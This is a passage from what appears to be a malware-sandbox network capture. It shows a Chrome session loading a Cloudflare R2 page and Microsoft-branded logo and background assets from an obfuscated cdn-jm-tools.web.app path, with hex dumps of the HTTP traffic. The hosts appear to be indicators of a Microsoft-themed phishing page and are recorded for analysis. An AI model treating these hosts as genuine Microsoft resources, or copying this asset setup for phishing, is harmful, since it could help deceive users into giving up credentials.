22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <sty
2024-04-16 23:37:40 UTC	1369	IN	Data Raw: 32 20 7b 0a 20 20 20 20 20 20 20 20 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 25 2c 0a 20 20 20 20 20 20 20 20 35 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 35 70 78 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 36 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 70 78 29 3b 0a 20 20 20 20 Data Ascii: 2 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px);
2024-04-16 23:37:40 UTC	1369	IN	Data Raw: 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 20 69 64 3d 22 66 6f 6f 74 65 72 2d 74 69 74 6c 65 22 3e 49 73 20 74 68 69 73 20 79 6f 75 72 20 62 75 63 6b 65 74 3f 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 4c 65 61 72 6e 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 72 32 2f 64 61 74 61 2d 61 63 63 65 73 73 2f 70 75 62 6c 69 63 2d 62 75 63 6b 65 74 73 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: </p> </div> <div> <p id="footer-title">Is this your bucket?</p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/"
2024-04-16 23:37:40 UTC	1369	IN	Data Raw: 6c 3d 22 23 43 35 45 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 3d 22 23 36 45 43 43 45 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 43 31 32 31 2e 30 35 33 20 31 33 2e 32 37 37 20 31 31 38 2e 32 30 34 20 31 30 2e 34 32 38 38 20 31 31 38 2e 32 30 34 20 36 2e 39 31 35 33 34 43 31 31 38 2e 32 30 34 20 33 2e 34 30 31 39 31 20 31 32 31 2e 30 35 33 20 30 2e 35 35 33 37 31 31 20 31 32 34 2e 35 36 36 20 30 2e 35 35 33 37 31 31 43 31 32 38 2e 30 38 20 30 2e 35 35 33 37 31 31 20 31 33 30 2e 39 32 38 20 33 2e 34 30 Data Ascii: l="#C5EBF5" stroke="#6ECCE5" stroke-width="2" /> <path d="M124.566 13.277C121.053 13.277 118.204 10.4288 118.204 6.91534C118.204 3.40191 121.053 0.553711 124.566 0.553711C128.08 0.553711 130.928 3.40
2024-04-16 23:37:40 UTC	1369	IN	Data Raw: 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 4c 36 30 2e 39 37 31 32 20 31 30 36 2e 39 30 36 43 36 30 2e 39 37 31 32 20 31 30 36 2e 39 30 36 20 36 32 2e 34 37 32 20 39 38 2e 33 33 34 35 20 36 37 2e 38 33 30 34 20 39 39 2e 36 31 34 39 43 37 33 2e 31 38 38 38 20 31 30 30 2e 38 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 48 37 35 2e 35 34 35 39 43 37 35 2e 35 34 35 39 20 31 30 38 2e 31 39 35 20 37 38 2e 33 33 35 33 20 39 35 2e 39 36 31 31 20 36 38 2e 36 38 36 38 20 39 34 2e 30 34 34 35 43 35 39 2e 30 33 38 34 20 39 32 2e 31 32 37 38 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 Data Ascii: <path d="M56.0777 105.406L60.9712 106.906C60.9712 106.906 62.472 98.3345 67.8304 99.6149C73.1888 100.895 71.2559 108.195 71.2559 108.195H75.5459C75.5459 108.195 78.3353 95.9611 68.6868 94.0445C59.0384 92.1278 56.0777 105.406 56.0777 105.406
2024-04-16 23:37:40 UTC	1369	IN	Data Raw: 20 31 32 34 2e 37 31 37 20 31 30 36 2e 39 33 37 43 31 32 34 2e 30 35 38 20 31 30 36 2e 39 33 37 20 31 32 33 2e 34 30 36 20 31 30 37 2e 30 36 37 20 31 32 32 2e 37 39 38 20 31 30 37 2e 33 31 39 43 31 32 32 2e 31 38 39 20 31 30 37 2e 35 37 31 20 31 32 31 2e 36 33 36 20 31 30 37 2e 39 34 31 20 31 32 31 2e 31 37 20 31 30 38 2e 34 30 37 43 31 32 30 2e 37 30 34 20 31 30 38 2e 38 37 32 20 31 32 30 2e 33 33 35 20 31 30 39 2e 34 32 35 20 31 32 30 2e 30 38 33 20 31 31 30 2e 30 33 34 43 31 31 39 2e 38 33 31 20 31 31 30 2e 36 34 32 20 31 31 39 2e 37 30 31 20 31 31 31 2e 32 39 35 20 31 31 39 2e 37 30 31 20 31 31 31 2e 39 35 33 56 31 31 31 2e 39 35 33 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: 124.717 106.937C124.058 106.937 123.406 107.067 122.798 107.319C122.189 107.571 121.636 107.941 121.17 108.407C120.704 108.872 120.335 109.425 120.083 110.034C119.831 110.642 119.701 111.295 119.701 111.953V111.953Z" fill="#0055DC"
2024-04-16 23:37:40 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 39 2e 37 39 32 20 34 38 2e 39 35 31 36 43 31 33 34 2e 39 39 35 20 34 38 2e 39 35 31 36 20 31 33 31 2e 31 30 36 20 34 35 2e 30 36 32 37 20 31 33 31 2e 31 30 36 20 34 30 2e 32 36 35 36 43 31 33 31 2e 31 30 36 20 33 35 2e 34 36 38 34 20 31 33 34 2e 39 39 35 20 33 31 2e 35 37 39 35 20 31 33 39 2e 37 39 32 20 33 31 2e 35 37 39 35 43 31 34 34 2e 35 38 39 20 33 31 2e 35 37 39 35 20 31 34 38 2e 34 37 38 20 33 35 2e 34 36 38 34 20 31 34 38 2e 34 37 38 20 34 30 2e 32 36 35 36 43 31 34 38 2e 34 37 38 20 34 35 2e 30 36 32 37 20 31 34 34 2e 35 38 39 20 34 38 2e 39 35 31 36 20 31 33 39 2e 37 39 32 20 34 38 2e 39 35 31 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 Data Ascii: d="M139.792 48.9516C134.995 48.9516 131.106 45.0627 131.106 40.2656C131.106 35.4684 134.995 31.5795 139.792 31.5795C144.589 31.5795 148.478 35.4684 148.478 40.2656C148.478 45.0627 144.589 48.9516 139.792 48.9516Z" fill="white"
2024-04-16 23:37:40 UTC	1369	IN	Data Raw: 37 34 20 31 31 30 2e 33 35 37 20 34 34 2e 35 31 31 38 20 31 31 31 2e 34 37 32 20 34 34 2e 35 31 33 39 43 31 31 32 2e 35 38 38 20 34 34 2e 35 31 33 39 20 31 31 33 2e 36 35 38 20 34 34 2e 30 37 30 36 20 31 31 34 2e 34 34 37 20 34 33 2e 32 38 31 33 43 31 31 35 2e 32 33 37 20 34 32 2e 34 39 32 31 20 31 31 35 2e 36 38 20 34 31 2e 34 32 31 36 20 31 31 35 2e 36 38 20 34 30 2e 33 30 35 35 43 31 31 35 2e 36 37 38 20 33 39 2e 31 39 30 37 20 31 31 35 2e 32 33 34 20 33 38 2e 31 32 32 34 20 31 31 34 2e 34 34 35 20 33 37 2e 33 33 34 39 43 31 31 33 2e 36 35 36 20 33 36 2e 35 34 37 34 20 31 31 32 2e 35 38 36 20 33 36 2e 31 30 35 32 20 31 31 31 2e 34 37 32 20 33 36 2e 31 30 35 32 43 31 31 30 2e 33 35 38 20 33 36 2e 31 30 37 33 20 31 30 39 2e 32 39 31 20 33 36 2e 35 35 30 Data Ascii: 74 110.357 44.5118 111.472 44.5139C112.588 44.5139 113.658 44.0706 114.447 43.2813C115.237 42.4921 115.68 41.4216 115.68 40.3055C115.678 39.1907 115.234 38.1224 114.445 37.3349C113.656 36.5474 112.586 36.1052 111.472 36.1052C110.358 36.1073 109.291 36.550
2024-04-16 23:37:40 UTC	1369	IN	Data Raw: 20 31 35 32 2e 36 34 31 20 31 32 37 2e 35 35 32 20 31 34 38 2e 32 34 39 20 31 32 37 2e 35 35 32 20 31 34 32 2e 38 33 31 43 31 32 37 2e 35 35 32 20 31 33 37 2e 34 31 32 20 31 33 31 2e 38 31 38 20 31 33 33 2e 30 32 20 31 33 37 2e 30 38 31 20 31 33 33 2e 30 32 43 31 34 32 2e 33 34 34 20 31 33 33 2e 30 32 20 31 34 36 2e 36 31 31 20 31 33 37 2e 34 31 32 20 31 34 36 2e 36 31 31 20 31 34 32 2e 38 33 31 43 31 34 36 2e 36 31 31 20 31 34 38 2e 32 34 39 20 31 34 32 2e 33 34 34 20 31 35 32 2e 36 34 31 20 31 33 37 2e 30 38 31 20 31 35 32 2e 36 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 43 35 45 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 Data Ascii: 152.641 127.552 148.249 127.552 142.831C127.552 137.412 131.818 133.02 137.081 133.02C142.344 133.02 146.611 137.412 146.611 142.831C146.611 148.249 142.344 152.641 137.081 152.641Z" fill="#C5EBF5" /> </g> <g
2024-04-16 23:37:40 UTC	1369	IN	Data Raw: 36 2e 37 36 35 56 39 35 2e 32 34 33 37 48 31 30 33 2e 32 35 32 56 37 31 2e 31 39 32 39 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 36 45 43 43 45 35 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37 2e 30 38 37 20 37 35 2e 36 33 35 48 31 34 32 2e 31 37 37 56 37 39 2e 37 33 37 39 48 31 33 37 2e 30 38 37 56 37 35 2e 36 33 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 39 2e 38 35 32 20 37 35 2e 36 33 35 48 31 33 34 2e 39 33 34 56 37 39 2e 37 33 37 39 48 Data Ascii: 6.765V95.2437H103.252V71.1929Z" fill="#6ECCE5" /> <path d="M137.087 75.635H142.177V79.7379H137.087V75.635Z" fill="#0055DC" /> <path d="M129.852 75.635H134.934V79.7379H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49719	199.36.158.100	443	6352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 23:37:40 UTC	415	OUT	GET /d..p/others/mi..cro---t/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 23:37:40 UTC	590	IN	HTTP/1.1 200 OK Connection: close Content-Length: 240 Cache-Control: max-age=3600 Content-Type: image/png Etag: "a512441fed43fc63c5a2bbce213d4081532632f57c75eb60cb7dd0e4a1126b38" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Tue, 16 Apr 2024 23:37:40 GMT X-Served-By: cache-pdk-kfty2130022-PDK X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1713310660.167525,VS0,VE1 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-16 23:37:40 UTC	240	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 a2 49 44 41 54 48 89 ed 94 bb 0d c2 40 10 05 c7 08 11 bb 05 3a 20 21 44 e2 25 14 40 25 f4 e2 3e 28 80 e4 05 34 40 46 48 4e 44 07 47 6a 9d 6c d9 27 ed 49 20 f9 85 1b cc 68 3f da 26 a5 44 cd ac aa d2 17 c1 7f 09 24 b5 92 da 52 c1 7a 2e 1c b8 01 1b 60 17 2a e8 c1 b7 c0 b9 04 0e 13 23 ca e1 b6 ef 61 82 08 38 40 33 f4 2a 7a f0 3d f0 04 de 33 58 17 db 8f bc 58 fd 4c 07 3b 80 b8 11 8d 76 60 fb 03 9c 80 17 70 95 74 08 15 44 49 26 77 90 49 ba 70 41 26 39 96 0a 46 97 1c 95 df f9 a6 8b a0 5a be 46 47 3c 26 c0 3a 39 11 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRw=pHYs~IDATH@: !D%@%>(4@FHNDGjl'I h?&D$Rz.`#a8@3z=3XXL;v`ptDI&wIpA&9FZFG<&:9IENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49718	199.36.158.100	443	6352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 23:37:40 UTC	418	OUT	GET /d..p/others/mi..cro---t/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 23:37:40 UTC	594	IN	HTTP/1.1 200 OK Connection: close Content-Length: 915 Cache-Control: max-age=3600 Content-Type: image/svg+xml Etag: "cf034e803491c0dbb1074332cd18fac418b94b0a139a7ddbf92ec40574951a8a" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Tue, 16 Apr 2024 23:37:40 GMT X-Served-By: cache-pdk-kfty2130058-PDK X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1713310660.176656,VS0,VE3 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-16 23:37:40 UTC	915	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 36 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 37 37 37 37 37 37 22 20 64 3d 22 4d 31 2e 31 34 33 2c 36 2e 38 35 37 61 31 2e 31 30 37 2c 31 2e 31 30 37 2c 30 2c 30 2c 31 2c 2e 34 34 36 2e 30 38 39 2c 31 2e 31 36 34 2c 31 2e 31 36 34 2c 30 2c 30 2c 31 2c 2e 36 30 37 2e 36 30 37 2c 31 2e 31 36 31 2c 31 2e 31 36 31 2c 30 2c 30 2c 31 2c 30 2c 2e 38 39 33 2c 31 2e 31 36 34 2c 31 2e 31 36 34 2c 30 2c 30 2c 31 2d 2e 36 30 37 2e 36 30 37 2c 31 2e 31 30 37 2c 31 2e Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#777777" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49720	199.36.158.100	443	6352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 23:37:40 UTC	419	OUT	GET /d..p/others/mi..cro---t/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 23:37:40 UTC	597	IN	HTTP/1.1 200 OK Connection: close Content-Length: 3651 Cache-Control: max-age=3600 Content-Type: image/svg+xml Etag: "2084deafc36fbaca40a6352319b3c1edb1262245428033547de6b82e0c2dcfe8" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Tue, 16 Apr 2024 23:37:40 GMT X-Served-By: cache-pdk-kfty2130055-PDK X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1713310660.177486,VS0,VE369 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-16 23:37:40 UTC	1378	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0
2024-04-16 23:37:40 UTC	1378	IN	Data Raw: 30 2c 30 2c 31 2d 33 2e 36 35 32 2d 31 2e 33 35 32 41 34 2e 39 38 37 2c 34 2e 39 38 37 2c 30 2c 30 2c 31 2c 36 36 2e 34 30 36 2c 31 33 2e 36 6d 32 2e 34 32 35 2d 2e 30 37 37 61 33 2e 35 33 35 2c 33 2e 35 33 35 2c 30 2c 30 2c 30 2c 2e 37 2c 32 2e 33 36 38 2c 32 2e 35 30 35 2c 32 2e 35 30 35 2c 30 2c 30 2c 30 2c 32 2e 30 31 31 2e 38 31 38 2c 32 2e 33 34 35 2c 32 2e 33 34 35 2c 30 2c 30 2c 30 2c 31 2e 39 33 34 2d 2e 38 31 38 2c 33 2e 37 38 33 2c 33 2e 37 38 33 2c 30 2c 30 2c 30 2c 2e 36 36 34 2d 32 2e 34 32 35 2c 33 2e 36 35 31 2c 33 2e 36 35 31 2c 30 2c 30 2c 30 2d 2e 36 38 38 2d 32 2e 34 31 31 2c 32 2e 33 38 39 2c 32 2e 33 38 39 2c 30 2c 30 2c 30 2d 31 2e 39 32 39 2d 2e 38 31 33 2c 32 2e 34 34 2c 32 2e 34 34 2c 30 2c 30 2c 30 2d 31 2e 39 38 38 2e 38 35 32 Data Ascii: 0,0,1-3.652-1.352A4.987,4.987,0,0,1,66.406,13.6m2.425-.077a3.535,3.535,0,0,0,.7,2.368,2.505,2.505,0,0,0,2.011.818,2.345,2.345,0,0,0,1.934-.818,3.783,3.783,0,0,0,.664-2.425,3.651,3.651,0,0,0-.688-2.411,2.389,2.389,0,0,0-1.929-.813,2.44,2.44,0,0,0-1.988.852
2024-04-16 23:37:40 UTC	895	IN	Data Raw: 39 2c 30 2c 30 2c 30 2d 31 2e 39 38 37 2e 38 35 32 2c 33 2e 37 30 37 2c 33 2e 37 30 37 2c 30 2c 30 2c 30 2d 2e 37 30 37 2c 32 2e 34 33 6d 31 35 2e 34 36 34 2d 33 2e 31 30 39 48 39 39 2e 37 56 31 38 2e 34 48 39 37 2e 33 34 31 56 31 30 2e 34 31 32 48 39 35 2e 36 38 36 56 38 2e 35 30 37 68 31 2e 36 35 35 56 37 2e 31 33 61 33 2e 34 32 33 2c 33 2e 34 32 33 2c 30 2c 30 2c 31 2c 31 2e 30 31 35 2d 32 2e 35 35 35 2c 33 2e 35 36 31 2c 33 2e 35 36 31 2c 30 2c 30 2c 31 2c 32 2e 36 2d 31 2c 35 2e 38 30 37 2c 35 2e 38 30 37 2c 30 2c 30 2c 31 2c 2e 37 35 31 2e 30 34 33 2c 32 2e 39 39 33 2c 32 2e 39 39 33 2c 30 2c 30 2c 31 2c 2e 35 37 37 2e 31 33 56 35 2e 37 36 34 61 32 2e 34 32 32 2c 32 2e 34 32 32 2c 30 2c 30 2c 30 2d 2e 34 2d 2e 31 36 34 2c 32 2e 31 30 37 2c 32 2e 31 Data Ascii: 9,0,0,0-1.987.852,3.707,3.707,0,0,0-.707,2.43m15.464-3.109H99.7V18.4H97.341V10.412H95.686V8.507h1.655V7.13a3.423,3.423,0,0,1,1.015-2.555,3.561,3.561,0,0,1,2.6-1,5.807,5.807,0,0,1,.751.043,2.993,2.993,0,0,1,.577.13V5.764a2.422,2.422,0,0,0-.4-.164,2.107,2.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49722	13.107.213.41	443	6352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 23:37:40 UTC	680	OUT	GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 23:37:40 UTC	805	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 23:37:40 GMT Content-Type: image/svg+xml Content-Length: 673 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 12 Feb 2020 22:01:30 GMT ETag: 0x8D7B0071D86E386 x-ms-request-id: e6339bee-b01e-000d-5650-903a85000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240416T233740Z-r1f585c6b654cgwleayu8v9rpg00000003yg00000000124y x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-04-16 23:37:40 UTC	673	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9!9A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49725	104.123.200.136	443

Timestamp	Bytes transferred	Direction	Data
2024-04-16 23:37:42 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-16 23:37:42 UTC	468	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/073D) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus2-z1 Cache-Control: public, max-age=113167 Date: Tue, 16 Apr 2024 23:37:42 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49726	199.36.158.100	443	6352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
